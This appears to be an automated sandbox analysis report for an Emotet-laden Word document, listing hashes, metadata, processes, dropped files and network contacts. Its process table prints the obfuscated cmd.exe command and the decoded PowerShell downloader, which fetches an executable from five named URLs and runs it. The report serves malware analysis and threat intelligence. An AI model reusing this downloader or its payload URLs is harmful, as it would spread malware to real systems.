File name: | 46483924689413440.doc |
Full analysis: | https://app.any.run/tasks/5684d7d9-9c52-4252-956a-41c64b8f3ad5 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 19, 2018, 00:37:36 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 18 20:23:00 2018, Last Saved Time/Date: Tue Dec 18 20:23:00 2018, Number of Pages: 1, Number of Words: 5, Number of Characters: 30, Security: 0 |
MD5: | 51B8753650C086FAC69EB98B8899075A |
SHA1: | 72DE3C9C34B56305E198571FA60DEB216C9CAD07 |
SHA256: | 94B72E750CC565C4650FB9FF9844F9D9D832C116DBFE8FF0F019297828D638DB |
SSDEEP: | 3072:20nbUhRCCPso5K8GhDS0o9zTGOZD6EbzCdT+5b6J:aEoUOZDlbeT+be |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 34 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 30 |
Words: | 5 |
Pages: | 1 |
ModifyDate: | 2018:12:18 20:23:00 |
CreateDate: | 2018:12:18 20:23:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3312 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\46483924689413440.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2408 | c:\Q122711979\M58007272152\E7624022832278\..\..\..\windows\system32\cmd.exe /c %ProGRamdata:~0,1%%PrOgramDatA:~9,2% /V /C " sEt ce=;'539o'=022Z$}}{hctac}};kaerb;'312I'=095v$;096t$ metI-ekovnI{ )00008 eg- htgnel.)096t$ metI-teG(( fI;'110t'=593z$;)096t$ ,032r$(eliFdaolnwoD.400Y${yrt{)148o$ ni 032r$(hcaerof;'exe.'+810G$+'\'+pmet:vne$=096t$;'360a'=219K$;'165' = 810G$;'050i'=859N$;)'@'(tilpS.'qTpyYh_GBbC1HE/moc.salladsserpxe0401.www//:ptth@TUWL_ZkWRfQ1z/nimda-pw/nv.ratsnvoacgnauq.www//:ptth@ipAYvqb_I5GWNKHW/moc.cjotutitsni.www//:ptth@A0M6a_pjX/moc.qazorrutiabdijsam.www//:ptth@JtV8PBMG_ZW2K/ten.sedudevacnam.www//:ptth'=148o$;tneilCbeW.teN tcejbo-wen=400Y$;'821N'=497G$ ll%1,3-~:PMET%h%1,4-~:EMANNOISSES%r%1,5~:CILBUP%wop&& FOR /L %q In ( 590 -1 0) Do set zcd=!zcd!!ce:~ %q, 1!&&If %q eQu 0 echo !zcd:~ -591! | Cm%os:~3,-6% " | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2988 | CmD /V /C " sEt ce=;'539o'=022Z$}}{hctac}};kaerb;'312I'=095v$;096t$ metI-ekovnI{ )00008 eg- htgnel.)096t$ metI-teG(( fI;'110t'=593z$;)096t$ ,032r$(eliFdaolnwoD.400Y${yrt{)148o$ ni 032r$(hcaerof;'exe.'+810G$+'\'+pmet:vne$=096t$;'360a'=219K$;'165' = 810G$;'050i'=859N$;)'@'(tilpS.'qTpyYh_GBbC1HE/moc.salladsserpxe0401.www//:ptth@TUWL_ZkWRfQ1z/nimda-pw/nv.ratsnvoacgnauq.www//:ptth@ipAYvqb_I5GWNKHW/moc.cjotutitsni.www//:ptth@A0M6a_pjX/moc.qazorrutiabdijsam.www//:ptth@JtV8PBMG_ZW2K/ten.sedudevacnam.www//:ptth'=148o$;tneilCbeW.teN tcejbo-wen=400Y$;'821N'=497G$ ll%1,3-~:PMET%h%1,4-~:EMANNOISSES%r%1,5~:CILBUP%wop&& FOR /L %q In ( 590 -1 0) Do set zcd=!zcd!!ce:~ %q, 1!&&If %q eQu 0 echo !zcd:~ -591! | Cmd " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3108 | C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $G794='N128';$Y004=new-object Net.WebClient;$o841='http://www.mancavedudes.net/K2WZ_GMBP8VtJ@http://www.masjidbaiturrozaq.com/Xjp_a6M0A@http://www.institutojc.com/WHKNWG5I_bqvYApi@http://www.quangcaovnstar.vn/wp-admin/z1QfRWkZ_LWUT@http://www.1040expressdallas.com/EH1CbBG_hYypTq'.Split('@');$N958='i050';$G018 = '561';$K912='a063';$t690=$env:temp+'\'+$G018+'.exe';foreach($r230 in $o841){try{$Y004.DownloadFile($r230, $t690);$z395='t011';If ((Get-Item $t690).length -ge 80000) {Invoke-Item $t690;$v590='I213';break;}}catch{}}$Z220='o935'; " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3192 | Cmd | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3632 | powershell $G794='N128';$Y004=new-object Net.WebClient;$o841='http://www.mancavedudes.net/K2WZ_GMBP8VtJ@http://www.masjidbaiturrozaq.com/Xjp_a6M0A@http://www.institutojc.com/WHKNWG5I_bqvYApi@http://www.quangcaovnstar.vn/wp-admin/z1QfRWkZ_LWUT@http://www.1040expressdallas.com/EH1CbBG_hYypTq'.Split('@');$N958='i050';$G018 = '561';$K912='a063';$t690=$env:temp+'\'+$G018+'.exe';foreach($r230 in $o841){try{$Y004.DownloadFile($r230, $t690);$z395='t011';If ((Get-Item $t690).length -ge 80000) {Invoke-Item $t690;$v590='I213';break;}}catch{}}$Z220='o935'; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3312 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA5C9.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3312 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9CE149D9.wmf | — | |
MD5:— | SHA256:— | |||
3312 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2DD5224F.wmf | — | |
MD5:— | SHA256:— | |||
3632 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MYNR5VCFBK12NFXXOTPR.temp | — | |
MD5:— | SHA256:— | |||
3312 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:C9005899C42F58E9E7C96DCB3A5EE8E3 | SHA256:BAAA4B86601B2CDBDAF8C9D3F3076A6A57EBB0E5FFD49CF53E039A90105750E4 | |||
3632 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0C1DAA668BA499584B0AC7476368101E | SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA | |||
3312 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$483924689413440.doc | pgc | |
MD5:E5A77C78856F57ED96640332453CDB7F | SHA256:0A4FB7D21A3CF0176EEECC2D4385EE473B4CBD14827FD40A3FA721DF61A500A1 | |||
3632 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13b6ff.TMP | binary | |
MD5:0C1DAA668BA499584B0AC7476368101E | SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA | |||
3312 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\17C01338.wmf | wmf | |
MD5:31AFA32D6C7265A7A8E9FDBA4A853A41 | SHA256:3B3E8C200E612E4B8B6FC8C8DD157A459E8A873E7E021311EED96AA489766B43 | |||
3312 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F10E3606.wmf | wmf | |
MD5:F6EFF2FCFE27ADD3F740CD87C63AB2BF | SHA256:F06E0BF5A117EE57D944B2289BA8583C60C8A937CBDBD8A9DF10E019531539A9 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3632 | powershell.exe | GET | 404 | 108.174.157.86:80 | http://www.mancavedudes.net/K2WZ_GMBP8VtJ | US | xml | 345 b | suspicious |
3632 | powershell.exe | GET | 404 | 103.23.21.240:80 | http://www.masjidbaiturrozaq.com/Xjp_a6M0A | ID | xml | 345 b | suspicious |
3632 | powershell.exe | GET | 404 | 112.213.89.101:80 | http://www.quangcaovnstar.vn/wp-admin/z1QfRWkZ_LWUT | VN | xml | 345 b | suspicious |
3632 | powershell.exe | GET | 404 | 177.12.174.108:80 | http://www.institutojc.com/WHKNWG5I_bqvYApi | BR | xml | 345 b | malicious |
3632 | powershell.exe | GET | 404 | 192.185.73.3:80 | http://www.1040expressdallas.com/EH1CbBG_hYypTq | US | xml | 345 b | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3632 | powershell.exe | 177.12.174.108:80 | www.institutojc.com | IPV6 Internet Ltda | BR | malicious |
3632 | powershell.exe | 108.174.157.86:80 | www.mancavedudes.net | SoftLayer Technologies Inc. | US | suspicious |
3632 | powershell.exe | 112.213.89.101:80 | www.quangcaovnstar.vn | SUPERDATA | VN | suspicious |
3632 | powershell.exe | 103.23.21.240:80 | www.masjidbaiturrozaq.com | PT Infinys System Indonesia | ID | suspicious |
3632 | powershell.exe | 192.185.73.3:80 | www.1040expressdallas.com | CyrusOne LLC | US | unknown |
Domain | IP | Reputation |
---|---|---|
www.mancavedudes.net |
| suspicious |
www.masjidbaiturrozaq.com |
| suspicious |
www.institutojc.com |
| unknown |
www.quangcaovnstar.vn |
| suspicious |
www.1040expressdallas.com |
| unknown |